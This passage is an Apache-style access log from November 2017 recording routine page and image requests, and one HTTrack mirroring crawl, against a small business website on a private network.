192.168.0.11 - - [12/Nov/2017:15:57:15 -0500] "GET /uploads/2/9/1/4/29147191/protecting_your_identity.pdf HTTP/1.1" 200 775340 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.26 - - [12/Nov/2017:16:16:01 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81378 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:06 -0500] "GET /products.html HTTP/1.1" 200 7157 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26427 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38061 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /bcp.html HTTP/1.1" 200 6651 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /uploads/2/9/1/4/29147191/601239_orig.png HTTP/1.1" 200 111181 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /uploads/2/9/1/4/29147191/4304070_orig.png HTTP/1.1" 200 57269 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Coffee.html HTTP/1.1" 200 5011 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:05 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] "GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1" 200 120188 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5012 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /contact.html HTTP/1.1" 200 6976 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/contact.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1" 200 5011 "http://192.168.0.35/contact.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81378 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47804 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 
Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7769 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20174 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43725 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45953 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:34 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_cyber.pdf HTTP/1.1" 200 765195 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) 
AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /backblue.gif HTTP/1.1" 304 182 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /fade.gif HTTP/1.1" 304 181 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /products.html HTTP/1.1" 200 7157 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38061 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET 
/uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26427 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5012 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /risk.html HTTP/1.1" 200 6606 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1" 200 55344 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1" 200 5012 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1" 200 174914 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:05 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET 
/files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1" 200 265419 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5012 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:16 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_encryption.pdf HTTP/1.1" 200 1045139 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /incident.html HTTP/1.1" 200 6621 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 
200 5022 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /uploads/2/9/1/4/29147191/4174185_orig.png HTTP/1.1" 200 99002 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /uploads/2/9/1/4/29147191/1888827_orig.png HTTP/1.1" 200 59026 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working.html HTTP/1.1" 200 5011 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.36 - - [12/Nov/2017:18:35:47 -0500] "GET /robots.txt HTTP/1.1" 404 503 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:48 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:49 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:50 -0500] "GET /fade.gif HTTP/1.1" 200 1112 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 
3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:51 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:52 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:53 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:54 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42819 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:55 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47030 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:58 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7836 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:36:01 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) 
